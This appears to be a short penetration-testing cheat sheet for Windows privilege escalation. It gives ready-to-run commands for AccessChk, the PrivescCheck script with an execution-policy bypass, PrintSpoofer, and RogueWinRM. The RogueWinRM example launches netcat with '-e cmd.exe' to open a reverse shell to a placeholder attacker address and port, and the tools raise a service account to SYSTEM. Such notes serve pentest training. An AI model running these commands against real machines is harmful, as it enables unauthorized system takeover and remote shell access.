Common Tools

AccessChk

List Access of (Users - Groups) to Files - Directories - Registry Keys - Global Objects - Windows Services

:: Accept the Eula
accesschk /accepteula

:: Query Service Information
accesschk -qlc "ServiceName"

PrivescCheck

PowerShell Script that searches Common Privilege Escalation on the Target System.

# Sets Execution Policies for Windows Computers
# [Bypass] Nothing is Blocked and there are no Warnings or Prompts
Set-ExecutionPolicy Bypass -Scope process -Force

# Import the Powershell Script
Import-Module .\PrivescCheck.ps1
Invoke-PrivescCheck

RogueWinRM

Only Possible if WinRM Service Is Not Running

Default on Windows 10 but Not on Windows Server 2019.

Local Privilege Escalation Exploit that allows to Escalate from a Service Account with [SeImpersonatePrivilege] to Local SYSTEM Account.

RogueWinRM -p "C:\Tools\nc64.exe" -a "-e cmd.exe <ATTACKER_IP> <PORT>"

PrintSpoofer

From LOCAL/NETWORK SERVICE to SYSTEM by busing [SeImpersonatePrivilege]

PrintSpoofer64 -i -c powershell

AccessChk​

PrivescCheck​

RogueWinRM​

PrintSpoofer​

AccessChk

PrivescCheck

RogueWinRM

PrintSpoofer